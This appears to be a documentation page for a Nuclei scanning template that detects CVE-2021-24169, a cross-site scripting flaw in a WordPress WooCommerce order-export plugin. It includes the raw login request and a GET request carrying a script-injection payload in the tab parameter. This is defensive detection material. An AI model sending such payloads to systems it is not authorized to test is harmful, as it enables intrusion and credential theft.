WordPress Advanced Order Export For WooCommerce <3.1.8 - Authenticated Cross-Site Scripting
ID: CVE-2021-24169
Severity: medium
Author: r3Y3r53
Tags: cve2021,cve,wordpress,authenticated,wpscan,xss,wp-plugin,wp,woo-order-export-lite,edb,algolplus
Description
Section titled “Description”WordPress Advanced Order Export For WooCommerce plugin before 3.1.8 contains an authenticated cross-site scripting vulnerability via the tab parameter in the admin panel. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
YAML Source
Section titled “YAML Source”id: CVE-2021-24169
info: name: WordPress Advanced Order Export For WooCommerce <3.1.8 - Authenticated Cross-Site Scripting author: r3Y3r53 severity: medium description: | WordPress Advanced Order Export For WooCommerce plugin before 3.1.8 contains an authenticated cross-site scripting vulnerability via the tab parameter in the admin panel. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. impact: | Authenticated users can execute arbitrary scripts on the affected WordPress site, leading to potential data theft, defacement, or further compromise. remediation: Fixed in version 3.1.8. reference: - https://wpscan.com/vulnerability/09681a6c-57b8-4448-982a-fe8d28c87fc3 - https://www.exploit-db.com/exploits/50324 - https://wordpress.org/plugins/woo-order-export-lite/ - https://nvd.nist.gov/vuln/detail/CVE-2021-24169 - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-24169 cwe-id: CWE-79 epss-score: 0.0021 epss-percentile: 0.5893 cpe: cpe:2.3:a:algolplus:advanced_order_export:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 2 vendor: algolplus product: advanced_order_export framework: wordpress tags: cve2021,cve,wordpress,authenticated,wpscan,xss,wp-plugin,wp,woo-order-export-lite,edb,algolplus
http: - raw: - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In - | GET /wp-admin/admin.php?page=wc-order-export&tab=</script><script>alert(document.domain)</script> HTTP/1.1 Host: {{Hostname}}
matchers: - type: dsl dsl: - 'status_code_2 == 200' - 'contains(body_2, "<script>alert(document.domain)</script>")' - 'contains(body_2, "woo-order-export-lite")' condition: and# digest: 490a00463044022044bb9411563940c16f56defb335f0988371c8486e1409baad2841b14fe10feba02207c95f8d410fd3c1c0f794f0576d343208b2622c6072c91917e88534d48482f36:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-24169.yaml"